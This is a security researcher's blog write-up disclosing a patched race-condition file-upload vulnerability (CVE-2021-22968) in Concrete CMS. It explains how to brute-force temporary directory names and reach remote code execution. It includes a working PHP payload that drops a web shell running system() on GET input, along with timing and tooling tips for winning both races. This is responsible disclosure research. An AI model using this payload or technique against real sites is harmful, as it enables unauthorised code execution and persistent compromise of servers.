INTRO
Concrete CMS is designed for ease of use, for users with a minimum of technical skills. It enables users to edit site content directly from the page. It provides version management for every page, similar to wiki software, another type of web site development software. Concrete5 allows users to edit images through an embedded editor on the page. As of 2021, there are over 62,000 live websites that use Concrete CMS under the hood. During a recent pentest, our team found a very interesting vulnerability. Discovery of the vulnerability was relatively simple (a race condition), however creating a POC was quite challenging, hence the reason for this post. You will need a low privileged user to exploit this vulnerability and gain RCE in Concrete CMS.
The vulnerability – a race condition in the file upload
As a limited user you can upload files from remote servers. You enter the url and the CMS will use curl to download it and write it locally (or to a bucket in AWS S3). This curl has a timeout of 60 seconds, this will become relevant later.
Now, some of you might be screaming “SSRF!”, which is fair, but we’ll get to that and how we bypassed all the SSRF mitigations in the 2nd part of this series. Some validations are in place for the filename, for example if you try to download php files this is what you will get:
The validations looked pretty good, but you know what we realized when tracing the code? Concrete CMS does good validations, but AFTER it saves the file locally, not before! Thus, we have a race condition, between the time the file is written locally and before it’s deleted due to the failed validations. Our first race condition, because as you will see, we’ll have 2 race conditions in the file upload to exploit. When we noticed this race condition, we knew that we could get RCE in Concrete CMS, but the actual exploit development, took longer than expected.
Let’s check the code, to see what’s going on:
But where is $temporaryDirectory coming from? The VolatileDirectory class creates a temporary directory in its constructor and deletes it in its destructor.
Inside this new directory it will write the downloaded file. The name of the directory is pseudo-random, $i will always be 0 in practice so we need to check uniqid()’s behavior, to understand what it does. Another problem that we have is that after the file download and post-download processing by the CMS, the VolatileDirectory destructor will delete everything:
Uniqid() behaviour
Ok, so as we said let’s check the uniqid() function in the php source code, to see what it returns:
This is really simple, there’s nothing too complex here. As you can see it simply executes gettimeofday() which returns the seconds and microseconds. There is no $more_entropy here, so the entire return value is based on seconds/microseconds and as we know these are highly predictable and we can bruteforce this. We only need to have enough time to do this, because in our initial tests a request took about 100ms to execute.
We need a plan
So basically in order to guess the name of the random directory we need to guess the second and microsecond that the server will use. We can guess the second part easily by syncing our host’s time with the server time, based on the response headers. We can place our attack server in the same time zone or AWS region, as close as possible to the target. But a request takes about 100ms time to execute, thus we need to extend this request’s execution time as much as possible so that we have time to bruteforce the volatile directory name. There are 1M possibilities directory names to check for, 1 for each microsecond.
How can we achieve this? Very simple, we will add a sleep() for 30-60 seconds in the test.php file, which will give us more time to win the race condition . This will basically force the CMS to keep the $temporaryDir directory for 30-60 seconds on the local filesystem before deleting it. Enough time for us to bruteforce the directory name with Turbo Intruder. When we found the existing directory we will get back a 200 HTTP response code. Bellow is the test.php file which we used (this php file echo-es another php file; and the echoed php code will write a php shell in the parent directory ):
<?php
set_time_limit(0);
sleep(35);
echo '<?php file_put_contents("../shell.php","<?php system(\$_GET[c]) ;");';
echo '?>' . str_repeat("A",50000000);
flush();
ob_flush();
?>
Here’s a diagram, of all the relevant moments of the attack, hopefully this will make things a bit clear.
- T0 you start the upload request AND you also start searching for the the volatile dir name. You have 1M possibilities, we managed to send 16-17K RPS, so you can easily brute-force 500-700K in ~30 seconds, that’s a 50% chance, works great. We didn’t queue 1M requests, due to some issues with Turbo Intruder.
- T1 you discover the volatile dir name (win first race), but test.php is not there yet. Thus you have to start searching for test.php (2nd race condition in the file upload) which will ALWAYS be written after ~30 seconds (after T0). We’ll queue another 500K requests in Turbo Intruder for this.
- T2 (~ 30th second) test.php is written locally, inside the volatile dir
- T3 one of the queued requests from T1 executes test.php and writes a permanent shell in the parent directory (“/application/files/tmp”)
- T4 both volatile dir and test.php inside are deleted, but we already have a shell 🙂
After we guess the name of the directory we will request test.php, which will write a permanent shell in the parent directory. Here’s a screenshot from Turbo Intruder with the guessed directory name:
The second race condition in the file upload
By making test.php to execute for ~30 seconds in order to guess the directory name, we have created a second race condition. We don’t know exactly when test.php will be written on the CMS filesystem, but it will obviously be after it has finished it’s own execution on the remote server (sleep time + a few more milliseconds). In practice this means that if we guess the directory name in the 10th second we will have to queue another 500K-1M requests in turbo intruder and this will have to cover all the time interval until test.php gets written to the file system. Worst case scenario, you have to send enough requests for another 30 seconds.
You can see in the screenshot above how we keep sending requests to test.php until we execute it. This is our temporary shell and it will write a permanent shell in the parent directory.
RCE in Concrete CMS
We hope things have been pretty clear so far, here’s our shell that gives us RCE & persistence:
Discovering this vulnerability was relatively easy, however putting a POC together was a very time consuming activity. We also had Turbo Intruder issues, thanks to @albinowax for fixing this issue. You can find our POC here.
Tips
- the timeout for curl is 60s, do not sleep() more than 60s in test.php
- use http2 if possible (for speed, it’s easier to win the race conditions)
- use tail -f access_log and tail -f error_log to monitor your requests and any errors
- check that your upload request from request.txt is still a valid session
- the upload request must come from a single ip by default
Timeline
- 30/10/2021 report sent to the vendor
- 08/11/2021 patched released (versions 8.5.7/9.0.1 – CVE-2021-22968)
- 15/11/2021 published this write-up
References
Multiple vulnerabilities in Concrete CMS Part 2
Account Takeover through Password Reset Poisoning vulnerability in Drupal CMS
Account Takeover through Password Reset Poisoning vulnerability and a Stored XSS for Full Compromise in Joomla